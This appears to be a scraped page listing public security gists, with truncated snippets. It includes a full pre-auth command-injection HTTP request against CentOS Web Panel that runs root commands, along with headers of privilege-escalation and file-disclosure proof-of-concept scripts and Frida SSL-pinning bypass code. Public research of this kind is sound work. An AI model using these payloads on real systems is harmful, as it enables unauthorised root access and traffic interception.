numan türle numanturle

divinepwner /
Created Aug 26, 2021
cwp pre-auth command inj BUT ULTRA RARE case.

This is a very very rare case on CentOS Web Panel. Key value should be set on target CentOS Web Panel. When key value has been set on target, this can be bypassed with ".?" and without key value, commands can be executed on target system via root level privileges.

command injection on username parameter.

GET /admin/index.php?api=test&key=.?&action=xml&username=root;[command_here]%0A HTTP/1.1
Host: target:2087
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
tothi /
Created Aug 22, 2021
Razer USB gadget on Android for Local Privilege Escalation on Windows
# MINIMAL USB gadget setup using CONFIGFS for simulating Razer Gaming HID
# devices for triggering the vulnerable Windows Driver installer
# credits for the Windows Driver install vuln: @j0nh4t
# the script was developed & tested on Android LineageOS 18.1
m1racles-poc.c
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1.
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register.
* Please visit for more information.
* Licensed under the MIT license.
0xsha /
Last active Oct 21, 2021
Solarwinds_Orion_LFD (local file disclosure PoC for SolarWinds Orion aka door to SuperNova?)
# CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? )
# @0xSha
# (C) 2020
# Advisory :
# Mitigation :
# Details :
# C:\inetpub\SolarWinds\bin\OrionWeb.DLL
# According to SolarWinds.Orion.Web.HttpModules
antichown / Golang cross compilation
Last active Nov 7, 2020
Golang cross compilation
# Reference:
IvanChepurnyi / JIT results
Last active Apr 29, 2021
Benchmark HTTP service
wrk -c 500 -d 30s -t 12 -R 20k -L http://localhost:8888
Running 30s test @ http://localhost:8888
12 threads and 500 connections
Thread calibration: mean lat.: 456.139ms, rate sampling interval: 3485ms
Thread calibration: mean lat.: 458.787ms, rate sampling interval: 3125ms
Thread calibration: mean lat.: 294.161ms, rate sampling interval: 1654ms
Thread calibration: mean lat.: 391.126ms, rate sampling interval: 3123ms
Thread calibration: mean lat.: 325.404ms, rate sampling interval: 2699ms
Thread calibration: mean lat.: 359.069ms, rate sampling interval: 2533ms
Thread calibration: mean lat.: 72.867ms, rate sampling interval: 222ms
eybisi / hooky.js
Created Apr 18, 2020
// install package with adb install
// do not open application
// use -f force option
// frida -U -f -l del.js
Java.perform(function() {
var ssl = Java.use("k.x$b")
var channel = Java.use("f.e.c.b.g.f.g.a.c")
var Integer = Java.use("java.lang.Integer");
var ArrayList = Java.use("java.util.ArrayList");
gd-gif.php
<?php
// usage: php gd-gif.php image.gif gd-image.gif
// load the input GIF with GD and write it back out as a freshly encoded GIF
$gif = imagecreatefromgif($argv[1]);
imagegif($gif, $argv[2]);
SwitHak /
Last active May 24, 2021
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall


  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, announced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
akabe1 / frida_multiple_unpinning.js
Last active Oct 21, 2021
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
setTimeout(function() {
Java.perform(function () {